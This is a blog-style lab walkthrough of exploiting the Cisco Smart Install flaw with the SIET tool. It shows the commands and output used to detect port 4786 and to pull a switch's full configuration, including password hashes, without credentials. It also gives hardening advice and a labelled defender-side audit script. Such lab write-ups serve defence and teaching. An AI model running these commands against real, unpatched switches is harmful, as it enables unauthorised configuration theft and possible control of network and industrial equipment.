Monday, May 20, 2019

Attacking the Cisco Smart Install Vulnerability

The Cisco Smart Install service has been around for a long time, at least back to IOS 12.2.55. It suffers from a serious security vulnerability that allows an unauthenticated user to download the configuration or execute commands on the switch. Cisco released updates in late 2018 to resolve the issue, but there are probably millions of switches out there that haven't been upgraded yet.

Here is an article from the guys that found the exploit: https://embedi.org/blog/cisco-smart-install-remote-code-execution/. Their PoC code crashes the switch. As always, a crash is the first step in developing a usable exploit.

They list the following models as vulnerable:

  • Catalyst 4500 Supervisor Engines
  • Catalyst 3850 Series
  • Catalyst 3750 Series
  • Catalyst 3650 Series
  • Catalyst 3560 Series
  • Catalyst 2960 Series
  • Catalyst 2975 Series
  • IE 2000
  • IE 3000
  • IE 3010
  • IE 4000
  • IE 4010
  • IE 5000
  • SM-ES2 SKUs
  • SM-ES3 SKUs
  • NME-16ES-1G-P
  • SM-X-ES3 SKUs


Notice it includes the Industrial Ethernet series. That's unfortunate given that those switches are likely to be in industrial plants and other locations where an attacker can do real physical damage.


My advice is to add "no vstack" to your deployment template unless you are actually using Smart Install. Also, as a Cisco best practice, the switch's management plane should be on a VLAN that is only accessible to trusted users.

There is a working exploit available from this GitHub repository - SIET.

As you can see in the exploit description, there are several things you can do:

-t test device for smart install.
-g get device config.
-c change device config.
-u update device IOS.
-e execute commands in the device's console.
-i ip address of target device
-l ip list of targets (file path)
--thread-count number of threads to be spawned

Let's exploit a switch

As always, do not run this on a switch you don't own or have explicit written permission to test.

Is vstack running?

The tool can quickly check:

->sudo python siet.py -t -i 192.168.10.52
[INFO]: Sending TCP packet to 192.168.10.52
[INFO]: Smart Install Client feature active on 192.168.10.52
[INFO]: 192.168.10.52 is affected


If you are logged into a switch, there are a couple of quick ways to verify:

3750x#sh tcp brief all 
TCB       Local Address           Foreign Address        (state)
078C6E60  192.168.10.52.22        192.168.10.183.50902   ESTAB
07B162A8  *.4786                  *.*                    LISTEN
06FA06BC  *.443                   *.*                    LISTEN
06F9FCFC  *.443                   *.*                    LISTEN
06F9F33C  *.80                    *.*                    LISTEN
06F9E97C  *.80                    *.*                    LISTEN

Having port 4786 open means Smart Install is running.

or

3750x#sh vstack config 
 Role: Client (SmartInstall enabled)
 Vstack Director IP address: 0.0.0.0

 *** Following configurations will be effective only on director ***
 Vstack default management vlan: 1
 Vstack start-up management vlan: 1
 Vstack management Vlans: none
 Join Window Details:
Window: Open (default)
Operation Mode: auto (default)
 Vstack Backup Details:
Mode: On (default)
Repository: 

Note that it says "Vstack default management vlan: 1" but I am successfully attacking on VLAN 10.
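
A defender-side way to run the two checks above, plus the "no vstack" template advice, over saved command output from many switches. This is an added example, not part of the original post or of SIET; the function names and the hardened template fragment are assumptions made for illustration.

```python
import re

SMI_PORT = "4786"  # Smart Install TCP port shown in the listing above

def smi_listening(tcp_brief):
    """True if 'show tcp brief all' output has a LISTEN socket on TCP 4786."""
    for line in tcp_brief.splitlines():
        f = line.split()  # columns: TCB, local address, foreign address, state
        if len(f) == 4 and f[3] == "LISTEN" and f[1].rsplit(".", 1)[-1] == SMI_PORT:
            return True
    return False

def vstack_enabled(vstack_config):
    """Parse the 'Role:' line of 'show vstack config'; None if no such line."""
    m = re.search(r"^\s*Role:\s*\w+\s*\(SmartInstall (\w+)\)", vstack_config, re.M)
    return None if m is None else m.group(1).lower() == "enabled"

def has_no_vstack(running_config):
    """True if the saved configuration or template contains 'no vstack'."""
    return any(l.strip() == "no vstack" for l in running_config.splitlines())

def audit(name, tcp_brief="", vstack_config="", running_config=""):
    """Return a list of findings for one switch; an empty list means nothing flagged."""
    findings = []
    if smi_listening(tcp_brief):
        findings.append(f"{name}: TCP {SMI_PORT} is in LISTEN state")
    if vstack_enabled(vstack_config):
        findings.append(f"{name}: vstack role reports SmartInstall enabled")
    if running_config and not has_no_vstack(running_config):
        findings.append(f"{name}: configuration lacks 'no vstack'")
    return findings

# Captured output from the lab switch on this page (trimmed).
TCP_BRIEF = """\
TCB       Local Address           Foreign Address        (state)
078C6E60  192.168.10.52.22        192.168.10.183.50902   ESTAB
07B162A8  *.4786                  *.*                    LISTEN
06FA06BC  *.443                   *.*                    LISTEN
"""
VSTACK = " Role: Client (SmartInstall enabled)\n Vstack Director IP address: 0.0.0.0\n"
# Constructed template fragment for a remediated switch (not from the page).
HARDENED_CFG = "hostname sw-hardened\nno vstack\n!\n"

if __name__ == "__main__":
    for finding in audit("3750x", TCP_BRIEF, VSTACK, "hostname 3750x\n!\n"):
        print(finding)
    print(audit("sw-hardened", running_config=HARDENED_CFG) or "sw-hardened: clean")
```
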

So Smart Install is running on a 3750-x in my lab. The switch is running c3750e-universalk9-mz.150-2.SE10. I started out with c3750e-universalk9-tar.152-4.E7 but the switch would reload when I ran the tool with Smart Install enabled. Once I installed c3750e-universalk9-mz.150-2.SE10 I was able to download the full configuration without any credentials or SNMP RW string.

NOTE: The tool uses its own python tftp server so it will fail if you already have a tftp server running. In my case I had just uploaded the 15.2.SE10 firmware and the tftp server was running. It took me a minute to figure out why the tool was failing:
[INFO]: binding socket .. error: [Errno 98] Address already in use

First, let's see who's logged into the switch:


3750x#who
    Line       User       Host(s)              Idle       Location
*  1 vty 0     mhubbard   idle                 00:00:00 192.168.10.183

What type of authentication is in use?

3750x#sh run | sec aaa 
aaa new-model
aaa group server radius ISE-group
 server name ISE
!

3750x#test aaa group ISE-group mhubbard ************** new-code 
User successfully authenticated

USER ATTRIBUTES

service-type         0   7 [NAS Prompt]
Framed-Protocol      0   1 [PPP]
service-type         0   2 [Framed]
priv-lvl             0   15 (0xF)

So the switch is using RADIUS authentication and is connected to the RADIUS Server. I know that for sure because my account password had expired and I had to log into my Windows server and change it before I could log into the switch!

Download the configuration without any credentials

Run the Smart Install Exploitation Tool with the "-g" flag to download the configuration:

~/Dropbox/03_Tools/SIET$ 
->sudo python siet.py -g -i 192.168.10.52
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: Sending TCP packet to 192.168.10.52 
[INFO]: Package send success to 192.168.10.52: 
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
[INFO]: connect from  192.168.10.52 58422
[INFO]:[192.168.10.52] puting file 192.168.10.52.conf octet
[INFO]:[192.168.10.52]:[put] success binding data port 44000
[INFO]:[192.168.10.52]:[put] file tftp/192.168.10.52.conf finish download, size: 14351

Show the file in SIET's tftp folder

mhubbard@1S1K-G5-5587:~/Dropbox/03_Tools/SIET/tftp$ 
->ls -l
total 20
-rw-r--r-- 1 root root 14351 May 19 21:53 192.168.10.52.conf
-rw-r--r-- 1 root root    51 Mar  5 14:33 execute.txt


Display the configuration that was downloaded

cat 192.168.10.52.conf 

!
! No configuration change since last restart
!
version 15.0
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname 3750x
!
boot-start-marker
boot-end-marker
!
!
enable secret 5 $1$Ew15$ZstYXs4B38G/T710NavOV1
!
username cisco privilege 15 secret 5 $1$llTp$rNcLr9Y7GkG/zVmOdHNVR1
username hubbard privilege 15 secret 5 $1$5WVT$zWpFHuH2/FdDcQlOOchfS1
aaa new-model
!
!
aaa group server radius ISE-group
 server name ISE
!

Conclusion

Cisco Smart Install is very useful if you support remote sites without IT staff, but you must be aware of this vulnerability. If you use the Cisco best practice of ACLing the management plane to only a trusted network, you are probably not at much risk until you upgrade.

Speaking of Cisco best practices, the guys that wrote SIET also wrote a fantastic tool called the Cisco Configuration Analysis Tool (CCAT). It takes your switch config, runs it against the "Hardening Cisco IOS Devices" document, and shows all the best practices that you are running and, more importantly, any that you are missing.

You can check out the CCAT here